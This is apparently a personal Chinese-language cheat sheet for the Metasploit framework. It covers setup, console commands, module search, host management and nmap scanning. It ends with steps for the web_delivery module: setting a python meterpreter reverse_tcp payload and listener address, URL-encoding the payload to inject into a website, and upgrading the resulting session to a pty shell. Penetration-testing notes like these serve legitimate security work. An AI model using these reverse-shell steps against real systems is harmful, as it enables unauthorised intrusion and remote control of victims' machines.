基础 #
配置 #
vim ~/.zshrc
export PATH="$PATH:/opt/metasploit-framework/bin"
source ~/.zshrc
# 数据库
sudo apt install postgresql postgresql-contrib
msf文件系统:/opt/metasploit-framework/embedded/framework
基本命令 #
# 控制台
msfconsole
# 更新
msfupdate
# 显示所有可用选项
show -h
# 显示所有可用辅助模块(扫描器)
show auxiliary
# 加载插件
load xx
- 可以执行 shell 指令,或者
/bin/bash -i
启动交互式 shell
变量操作 #
msf 中使用 datastore 以键值对的形式存放变量。
- 变量不区分大小写
# 局部datastore模块
# set get
msf44 > set host 223.123.123.123
host => 223.123.123.123
msf44 > get host
host => 223.123.123.123
# 全局datastore
setg getg
# 删除
unset unsetg
# 显示所有datastore中的变量
set
模块 #
# 选择模块
use auxiliary/scanner/smb/smb_version
# 可用选项
show options
# 高级选项
show advanced
# 绕过选项
show evasion
# 检测缺少的选项
show missing
# 可用的payloads
show payloads
# 运行
run/exploit
# 退出
back
# 搜索
search windows exploit 2018
# 可选参数
# platform:windows type:exploit cve:2018
管理主机 #
# 查看所有主机
hosts
# 添加新主机
hosts -a <IP>
# 删除主机
hosts -d <IP>
# 查看主机上的服务
services [<IP>]
# 指定端口
services -a <IP> -p <PORT>
扫描 #
nmap #
db_nmap <IP> --open
模块 #
web delivery #
- payload 生成
- 可以生成各种语言的反弹shell的payload
use exploit/multi/script/web_delivery
This exploit becomes a very useful tool when the attacker has some control of the system, but does not possess a full shell.
设置 target:
show targets
# 选一个
set target x
设置 payload:
set PAYLOAD python/meterpreter/reverse_tcp
设置 lhost:
set lhost 192.168.64.1
得到的 payload 要先 URL 编码再输入!!!
paylaod 传入网站之后,msf 查看会话:
sessions -i
session -i
命令用于与已经建立的会话进行交互。-i 1
是指第一个 session
输入shell进入shell:
后续可以通过 python 命令转成传统 shell:
python -c 'import pty;pty.spawn("/bin/bash")'
感觉不如直接 python 反弹shell到本机…..